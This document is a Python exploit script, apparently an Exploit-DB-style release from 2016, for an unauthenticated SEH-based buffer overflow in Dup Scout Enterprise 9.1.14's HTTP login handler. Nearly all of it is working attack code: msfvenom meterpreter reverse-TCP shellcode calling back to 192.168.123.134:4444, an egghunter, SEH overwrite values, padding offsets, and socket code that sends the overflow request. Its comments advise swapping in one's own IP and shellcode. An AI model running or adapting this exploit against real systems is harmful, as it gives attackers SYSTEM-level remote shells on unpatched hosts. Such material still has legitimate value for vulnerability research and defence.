Dup Scout Enterprise 9.1.14 — unauthenticated SEH-based buffer overflow in the HTTP /login handler (remote code execution as NT AUTHORITY\SYSTEM)
Posted on 29 November 2016
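#!/usr/bin/python
"""Dup Scout Enterprise 9.1.14 login buffer overflow (SEH overwrite + egghunter).

Author: Tulpa / tulpa[at]tulpa-security[dot]com
Author website: www.tulpa-security.com
Author twitter: @tulpa_security

Exploit will land you NT AUTHORITY\\SYSTEM.
You do not need to be authenticated; the password below is garbage.
Swap out the IP and the shellcode, and remember to adjust the 'A' padding
when the payload size changes.
Tested on Windows 7 x86 Enterprise SP1.
Vendor has been notified on multiple occasions.
Exploit for version 9.0.28: www.exploit-db.com/exploits/40457/
Shout-out to carbonated and ozzie_offsec.

Usage: python exploit.py [target_ip] [target_port]

NOTE(review): this listing was recovered from a copy in which every
backslash and CRLF had been stripped ("x41" -> "\\x41", header line
breaks -> "\\r\\n"). The byte sequences below were restored from the
published hex; re-verify the padding offset in a debugger before use.
"""
import socket
import sys

# Original listing connected to .130 but sent "Host: 192.168.123.132";
# the Host header now follows the target argument.
DEFAULT_TARGET = "192.168.123.130"
DEFAULT_PORT = 80

# Bad characters for this target: \x00 \x0a \x0d \x26 (NUL, LF, CR, '&').
# Generated with:
#   msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp \
#     LHOST=192.168.123.134 LPORT=4444 -e x86/shikata_ga_nai \
#     -b '\x00\x0a\x0d\x26' -f python --smallest
# Payload size: 308 bytes. Regenerate for your own LHOST/LPORT and keep
# the same bad-character list.
SHELLCODE = (
    b"\xdb\xdc\xb8\x95\x49\x89\x1d\xd9\x74\x24\xf4\x5f\x33"
    b"\xc9\xb1\x47\x31\x47\x18\x83\xc7\x04\x03\x47\x81\xab"
    b"\x7c\xe1\x41\xa9\x7f\x1a\x91\xce\xf6\xff\xa0\xce\x6d"
    b"\x8b\x92\xfe\xe6\xd9\x1e\x74\xaa\xc9\x95\xf8\x63\xfd"
    b"\x1e\xb6\x55\x30\x9f\xeb\xa6\x53\x23\xf6\xfa\xb3\x1a"
    b"\x39\x0f\xb5\x5b\x24\xe2\xe7\x34\x22\x51\x18\x31\x7e"
    b"\x6a\x93\x09\x6e\xea\x40\xd9\x91\xdb\xd6\x52\xc8\xfb"
    b"\xd9\xb7\x60\xb2\xc1\xd4\x4d\x0c\x79\x2e\x39\x8f\xab"
    b"\x7f\xc2\x3c\x92\xb0\x31\x3c\xd2\x76\xaa\x4b\x2a\x85"
    b"\x57\x4c\xe9\xf4\x83\xd9\xea\x5e\x47\x79\xd7\x5f\x84"
    b"\x1c\x9c\x53\x61\x6a\xfa\x77\x74\xbf\x70\x83\xfd\x3e"
    b"\x57\x02\x45\x65\x73\x4f\x1d\x04\x22\x35\xf0\x39\x34"
    b"\x96\xad\x9f\x3e\x3a\xb9\xad\x1c\x52\x0e\x9c\x9e\xa2"
    b"\x18\x97\xed\x90\x87\x03\x7a\x98\x40\x8a\x7d\xdf\x7a"
    b"\x6a\x11\x1e\x85\x8b\x3b\xe4\xd1\xdb\x53\xcd\x59\xb0"
    b"\xa3\xf2\x8f\x2d\xa1\x64\xf0\x1a\xd2\xf2\x98\x58\x25"
    b"\xeb\x04\xd4\xc3\x5b\xe5\xb6\x5b\x1b\x55\x77\x0c\xf3"
    b"\xbf\x78\x73\xe3\xbf\x52\x1c\x89\x2f\x0b\x74\x25\xc9"
    b"\x16\x0e\xd4\x16\x8d\x6a\xd6\x9d\x22\x8a\x98\x55\x4e"
    b"\x98\x4c\x96\x05\xc2\xda\xa9\xb3\x69\xe2\x3f\x38\x38"
    b"\xb5\xd7\x42\x1d\xf1\x77\xbc\x48\x8a\xbe\x28\x33\xe4"
    b"\xbe\xbc\xb3\xf4\xe8\xd6\xb3\x9c\x4c\x83\xe7\xb9\x92"
    b"\x1e\x94\x12\x07\xa1\xcd\xc7\x80\xc9\xf3\x3e\xe6\x55"
    b"\x0b\x15\xf6\xaa\xda\x53\x8c\xc2\xde"
)

# Tag the egghunter scans memory for; the 8-byte marker directly precedes
# SHELLCODE in the request body.
EGG = b"w00tw00t"

# SEH overwrite. nSEH = two NOPs + "jmp short +0x0b", which skips the
# SEH record and lands in the NOP sled ahead of the egghunter.
# SEH = pop/pop/ret at 0x1004FAF3 (little-endian). A hard-coded address
# in the 0x10000000 range implies a module loaded at a fixed base, i.e.
# without ASLR (and presumably without SafeSEH) -- confirm on your build.
NSEH = b"\x90\x90\xEB\x0B"
SEH = b"\xF3\xFA\x04\x10"

# Classic 32-byte int 0x2e egghunter: looks for "w00t" twice
# (mov eax, 0x74303077) and jumps to the bytes following the tag.
EGGHUNTER = (
    b"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
    b"\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
)

# Filler before the SEH record. Subtract/add here when the payload size
# changes (total layout must keep nSEH/SEH at the same offset).
PAD_LEN = 13664


def build_request(host, shellcode=SHELLCODE):
    """Return the raw HTTP POST that overflows the unauthenticated /login handler.

    Args:
        host: value used for the Host header (ASCII).
        shellcode: bad-character-free x86 payload placed after the egg tag;
            the overall layout assumes the default 308-byte size unless
            PAD_LEN is adjusted.

    Returns:
        The complete request as bytes: headers, CRLFCRLF, then the form
        body carrying padding, egg + shellcode, the SEH record and the
        egghunter.
    """
    body = b"".join([
        b"username=admin",
        # The published listing shows a line break after the password
        # value; it is restored as CRLF here to keep the byte count.
        b"&password=aaaaa\r\n",
        b"\x41" * PAD_LEN,
        b"B" * 100,
        EGG,
        shellcode,
        b"\x90" * 212,
        NSEH,
        SEH,
        b"\x90" * 10,
        EGGHUNTER,
        b"\x90" * 8672,
    ])
    headers = [
        b"POST /login HTTP/1.1",
        b"Host: " + host.encode("ascii"),
        b"User-Agent: Mozilla/5.0",
        b"Connection: close",
        b"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
        b"Accept-Language: en-us,en;q=0.5",
        b"Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7",
        b"Keep-Alive: 300",
        b"Proxy-Connection: keep-alive",
        b"Content-Type: application/x-www-form-urlencoded",
        # Kept verbatim from the original: the advertised length is
        # smaller than the actual body (~23 KB). Presumably the server
        # keeps reading anyway; changing this value was not tested.
        b"Content-Length: 17000",
    ]
    return b"\r\n".join(headers) + b"\r\n\r\n" + body


def main(argv=None):
    """Send the overflow request to the target given on the command line.

    Args:
        argv: optional [host, port]; defaults to sys.argv[1:], then to
            DEFAULT_TARGET / DEFAULT_PORT.

    Returns:
        0 on completion. Socket errors propagate to the caller.
    """
    argv = sys.argv[1:] if argv is None else argv
    host = argv[0] if argv else DEFAULT_TARGET
    port = int(argv[1]) if len(argv) > 1 else DEFAULT_PORT

    print("Dup Scout Enterprise 9.1.14 Login Buffer Overflow")
    print("Author: Tulpa / tulpa[at]tulpa-security[dot]com")

    request = build_request(host)
    # create_connection + timeout so a filtered port fails fast instead of
    # hanging; sendall (not send) so the whole ~23 KB buffer goes out.
    sock = socket.create_connection((host, port), timeout=10)
    try:
        print("Sending evil buffer (%d bytes) to %s:%d..." % (len(request), host, port))
        sock.sendall(request)
        print("Payload Sent!")
    finally:
        sock.close()
    return 0


if __name__ == "__main__":
    sys.exit(main())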